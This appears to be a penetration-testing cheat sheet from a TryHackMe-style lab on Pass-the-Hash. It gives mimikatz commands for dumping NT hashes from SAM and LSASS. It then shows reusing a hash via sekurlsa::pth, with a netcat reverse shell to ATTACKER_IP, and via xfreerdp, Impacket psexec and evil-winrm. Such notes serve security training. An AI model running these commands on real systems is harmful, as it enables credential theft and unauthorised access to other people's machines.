Passing the Hash (PtH)

NTLM

  In NTLM authentication the client never sends the password. It proves knowledge of the NT hash (MD4 of the UTF-16LE encoded password) by answering the server's challenge with an HMAC-MD5 keyed on that hash. The hash is therefore a password-equivalent: whoever holds it can authenticate as the user without cracking it, which is what Pass the Hash exploits.

Extracting NTLM Hashes

  1. From the Local SAM Database

    • Commands:

      mimikatz # privilege::debug
      mimikatz # token::elevate
      mimikatz # lsadump::sam
    • Note: lsadump::sam reads the hashes of local accounts from the SAM hive. The hive is readable only by SYSTEM, which is why token::elevate (impersonate a SYSTEM token) precedes it; privilege::debug alone (SeDebugPrivilege) is not enough.
  2. From LSASS Memory

    • Commands:

      mimikatz # privilege::debug
      mimikatz # token::elevate
      mimikatz # sekurlsa::msv
    • Note: sekurlsa::msv reads the MSV1_0 credential blocks of every logon session held by LSASS, so it also returns NT hashes of domain users who are (or recently were) logged on to this host. LSA Protection (RunAsPPL) or Credential Guard on the target will block or empty this output.

Using Extracted Hashes

  1. Reverting Privileges Before Use

    • Command:

      mimikatz # token::revert
    • Note: token::elevate left mimikatz impersonating SYSTEM. sekurlsa::pth must spawn the new process from your own logon session, so drop back to your original token first.
  2. Exploiting With PtH

    • Example Command:

      mimikatz # sekurlsa::pth /user:bob.jenkins /domain:za.tryhackme.com /ntlm:6b4a57f67805a663c818106dc0648484 /run:"c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 5555"
    • Note: /ntlm: takes the NT hash (32 hex characters) as printed by lsadump::sam or sekurlsa::msv. The process started by /run: (here a netcat reverse shell) keeps your local identity for local operations, but every network authentication it performs (SMB, WinRM, RDP, LDAP) uses bob.jenkins's injected hash, the same way runas /netonly would use a typed password.

Passing the Hash Using Linux

  1. Connect to RDP Using PtH

    • Command:

      xfreerdp /v:VICTIM_IP /u:DOMAIN\\MyUser /pth:NTLM_HASH
    • Note: /pth only works when Restricted Admin mode is enabled on the target (HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin set to 0). It is off by default, so the connection fails on an unmodified host. The double backslash escapes the backslash for the shell.
  2. Connect via PsExec Using PtH

    • Command:

      psexec.py -hashes :NTLM_HASH DOMAIN/MyUser@VICTIM_IP
    • Note: Impacket's -hashes expects LMHASH:NTHASH. Leave the LM part empty (:NTHASH) or use aad3b435b51404eeaad3b435b51404ee, the hash of an empty LM password; passing the NT hash alone without the colon is rejected. The Sysinternals PsExec.exe has no hash option, which is why this is done with the Impacket version from Linux.
  3. Connect to WinRM Using PtH

    • Command:

      evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH
    • Note: -H takes the NT hash. WinRM (TCP 5985, or 5986 for HTTPS) must be reachable and the account must be a local administrator or a member of Remote Management Users on the target.
